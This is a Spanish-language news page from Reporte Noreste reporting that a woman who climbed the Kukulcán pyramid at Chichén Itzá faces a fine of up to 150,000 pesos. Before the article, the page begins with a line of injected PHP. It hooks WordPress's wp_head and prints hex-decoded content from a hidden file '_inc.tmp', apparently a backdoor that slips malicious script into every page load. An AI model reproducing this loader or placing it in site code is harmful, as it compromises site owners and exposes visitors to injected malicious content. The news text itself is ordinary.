if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Mujer que subió al Chichén Itzá podría ser multada hasta con 150 mil pesos – Reporte Noreste
Conéctate con nosotros

CYEN

Mujer que subió al Chichén Itzá podría ser multada hasta con 150 mil pesos

Mujer que subió al Chichén Itzá podría ser multada hasta con 150 mil pesos

Autoridades informaron que la mujer subió a la Pirámide Kukulcán en Chichén Itzá, podría ser multada por 150 mil pesos.

El Instituto Nacional de Antropología e Historia indica que se prohibió hace más de dos décadas subir al Castillo de Kukulcán que es considerada una de las siete maravillas del mundo moderno, tratando de evitar su deterioro y la peligrosidad que esto representa.

Ignorando las advertencias, la mujer subió a la estructura, por lo que podría ser sancionada de acuerdo con la ley federal sobre monumentos arqueológicos artísticos e históricos en su Artículo 55 el cual advierte de penas y sanciones contra quienes dañen monumentos arqueológicos.

La mujer el fin de semana había subido el castillo de Kukulcán en Chichén Itzá a pesar de los cordones de seguridad que restringen el acceso al público, siendo abucheada por los ahí presentes quienes además la agredieron físicamente.

La mujer de quien se había dicho en un principio era extranjera, quedó a disposición de las autoridades y podría alcanzar la multa de hasta 150 mil pesos.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en CYEN